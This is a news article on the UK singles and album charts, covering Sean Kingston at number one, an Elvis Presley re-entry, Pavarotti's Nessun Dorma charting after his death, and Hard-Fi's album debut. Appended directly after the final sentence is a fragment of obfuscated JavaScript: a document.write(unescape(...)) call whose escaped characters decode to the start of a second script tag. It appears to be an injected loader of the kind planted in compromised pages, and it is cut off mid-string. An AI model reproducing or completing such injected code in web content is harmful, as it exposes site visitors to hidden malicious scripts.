Teenager Sean Kingston has kept the top spot in this week's UK singles chart but The King himself Elvis Presley is yet again back in the top 20.
The 17-year-old American singer made number one last week and stays there with his song Beautiful Girls.
But next time Kingston could have some surprising competition from the highest new entry at number 14 - Elvis Presley with (Let Me Be Your) Teddy Bear, a hit for the first time in 1957.
Girls Aloud are also in the mix with their new song Sexy No, No, No, which has hit number five. Other movers in the top 10 include James Blunt with his single 1973 moving up to number 4 from number 10 last week.
Another new entry in the singles chart was Luciano Pavarotti's Nessun Dorma, in at number 24 after a week in which it was never off the airwaves following the death of the singer, and his funeral yesterday.
Chart expert Gennaro Castaldo of music retailers HMV said people had rushed to download the song after the singer's death: "It really would be wonderful if Nessun Dorma could become the first classical piece of music to ever make it to the top of the official singles charts," he said.
"Not only would it be a fitting tribute to Pavarotti's genius, but it would acknowledge the great affection in which he was held by the public across the UK and Ireland."
This week's album chart is full of new entries with Once Upon A Time In The West by Hard-Fi going straight to number one.
The band knocked Newton Faulkner's Hand Built By Robots off the top spot and it falls to number four.
The Plain White T's with their album Every Second Counts is new in at number three along with Athlete who are straight to number five with Beyond The Neighbourhood.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22